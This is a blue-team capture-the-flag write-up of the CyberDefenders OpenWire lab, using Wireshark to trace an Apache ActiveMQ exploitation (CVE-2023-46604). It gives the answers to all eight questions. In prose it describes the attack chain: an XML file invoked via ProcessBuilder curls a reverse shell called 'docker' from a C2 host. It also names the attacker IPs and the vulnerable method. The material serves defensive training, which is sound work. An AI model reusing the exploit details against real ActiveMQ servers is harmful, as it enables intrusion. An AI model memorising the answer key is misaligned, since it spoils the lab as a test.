# OpenWire Lab (CyberDefenders) by 0xF4y3d
- [Introduction](#Introduction)
- [Challenge](#Challenge)
- [Steps](#Steps)
- [Conclusion](#Conclusion)
## Introduction
:::info
The lab targets those interested in Network Forensics using Wireshark, helping you dive into a **CVE** and search for its root cause.
:::
## Challenge
:::info
https://cyberdefenders.org/blueteam-ctf-challenges/openwire/
:::warning
**Instructions:**
Uncompress the lab (pass: cyberdefenders.org)
**Scenario:**
During your shift as a tier-2 SOC analyst, you receive an escalation from a tier-1 analyst regarding a public-facing server. This server has been flagged for making outbound connections to multiple suspicious IPs. In response, you initiate the standard incident response protocol, which includes isolating the server from the network to prevent potential lateral movement or data exfiltration and obtaining a packet capture from the NSM utility for analysis. Your task is to analyze the pcap and assess for signs of malicious activity.
**Tools:**
Wireshark
:::
## Steps
- [Q1](##Q1)
- [Q2](##Q2)
- [Q3](##Q3)
- [Q4](##Q4)
- [Q5](##Q5)
- [Q6](##Q6)
- [Q7](##Q7)
- [Q8](##Q8)
Let's first do our routine check when we have a capture file, to know which IPs we are working with, identify our search parameters, and determine what is suspicious and what is not.
1. Go to **Statistics -> Conversations**
We can see that we have 4 IPs here:
- 84.239.49.16
- 134.209.197.3
- 128.199.52.72
- 146.190.21.92
What can we guess from these conversations?
:::spoiler
1. We know that our server is now isolated based on the scenario we have.
2. So, since the IP 134.209.197.3 appears in all our captures and conversations, we can pretty much guess that it is our server.
3. By checking the bytes of the packets, we find a huge 5MB transfer that is being made from 146.190.21.92 to our server. <font color="#f00">SUS</font>! This could possibly be a malicious file being sent to our server.
:::
2. Go to **Statistics -> Protocol Hierarchy**
Hmmmm, interesting, there are some malformed packets in the TCP protocol and in an <font color="#f00">OpenWire</font> protocol. This could mean a lot, but first, letβs take our time to know what the OpenWire protocol is.
:::info
Here we can ask our beloved ChatGPT this simple question: "What is OpenWire protocol?" to get some insight on it.
:::warning
The OpenWire protocol is a wire-level protocol used for messaging between clients and brokers in Apache ActiveMQ, which is a popular open-source message broker. It is specifically designed to provide an efficient, high-performance, and reliable messaging infrastructure.
:::
So, we now know that it is some kind of messaging protocol used by the server, and it has a malformed packet!
PS: Sometimes it is a good practice to check the data section in the protocol hierarchy by applying it as a filter and checking it, but in this challenge, it didn't do any good for me.
### <font color="#AC19C9">Q1</font>
>By identifying the C2 IP, we can block traffic to and from this IP, helping to contain the breach and prevent further data exfiltration or command execution. Can you provide the IP of the C2 server that communicated with our server?
Let's take a look at our capture:
By investigating the malformed packet, we can get some insight into what it is intended to do:
It has an exception section that has a message attribute trying to access an XML file at the domain of this IP: <font color=#f00>146.190.21.92</font>
I guess that is enough to know that this is a suspicious C2 server.
:::spoiler
**Answer: 146.190.21.92**
:::
Great, let's jump to the next question.
### <font color="#AC19C9">Q2</font>
>Initial entry points are critical to trace back the attack vector. What is the port number of the service the adversary exploited?
That is easy, it's simply the destination port that the attacker accessed our server from and sent the malformed packet: <font color="#f00">61616</font>
:::spoiler
**Answer: 61616**
:::
### <font color="#AC19C9">Q3</font>
>Following up on the previous question, what is the name of the service found to be vulnerable?
From our previous search for the OpenWire protocol and asking ChatGPT, we know that it is designated for the <font color=#f00>Apache ActiveMQ</font>. So this is the vulnerable service.
:::spoiler
**Answer: Apache ActiveMQ**
:::
### <font color="#AC19C9">Q4</font>
>The attacker's infrastructure often involves multiple components. What is the IP of the second C2 server?
Remember the malformed packet that we inspected?
Let's go back to it:
Okay, so it is accessing an XML file that we can find in the upcoming packets after it:
Let's check packet 14, which has the XML file:
As expected! It is doing something I would flag as suspicious: curling a file called docker from the IP <font color=#f00>128.199.52.72</font> and making it executable. I guess that settles it π€¨
:::spoiler
**Answer: 128.199.52.72**
:::
A good exercise also is checking the file in VirusTotal.com. "Although I wouldn't download it on my main host, maybe a VM, and most definitely wouldn't double-click it XD."
**And Voila!**
It is not only malicious, it is flagged by the community as having something to do with a CVE in 2023.
### <font color="#AC19C9">Q5</font>
>Attackers usually leave traces on the disk. What is the name of the reverse shell executable dropped on the server?
We saw the XML curling a file called <font color="#f00"> **docker**</font> and making it executable.
By checking it also on VirusTotal.com, we find this:
Ooooh, this is too much XD, but we got what we wanted. This file is definitely the malicious shell executable.
:::spoiler
**Answer: docker**
:::
### <font color="#AC19C9">Q6</font>
>What Java class was invoked by the XML file to run the exploit?
That is an easy one, let us go back to the XML file:
We can see the class invoked right there.
:::spoiler
**Answer: java.lang.ProcessBuilder**
:::
### <font color="#AC19C9">Q7</font>
>To better understand the specific security flaw exploited, can you identify the CVE identifier associated with this vulnerability?
Hmm, we have stumbled upon it, haven't we?
When we uploaded the XML file to VirusTotal, remember?
Here:
CVE-2023-46604, hmm, how about we search for it?
Well, I guess that's it.
:::spoiler
**Answer: CVE-2023-46604**
:::
### <font color="#AC19C9">Q8</font>
>What is the vulnerable Java method and class that allows an attacker to run arbitrary code? (Format: Class.Method)
So, he is asking here about the specific class and method that caused this vulnerability to happen.
By searching for the exploit "CVE-2023-46604 exploit" and navigating some of the websites that discussed this matter, I found this:
https://www.trendmicro.com/en_us/research/23/k/cve-2023-46604-exploited-by-kinsing.html
Specifically:
From this, we can identify that the method that was vulnerable is <font color=#f00>createThrowable</font> of the `BaseDataStreamMarshaller` class, as it got patched and updated with the <font color=#f00>validateIsThrowable</font> method in its body.
:::spoiler
**Answer: BaseDataStreamMarshaller.createThrowable**
:::
## Conclusion
Woaah what a journey, so that settles it for us πππ
We've uncovered some critical insights using Wireshark and a systematic approach to analyzing the captured network traffic. From identifying the C2 servers and vulnerable service to understanding the specific exploit used, weβve pieced together the events of this attack scenario.
This exercise shows just how valuable network forensics can be in identifying and mitigating cyber threats. I hope you found this walk-through informative and engaging. If you have any questions or need further assistance, feel free to reach out. I'm always happy to help! π
Sign in with Wallet
Connect another wallet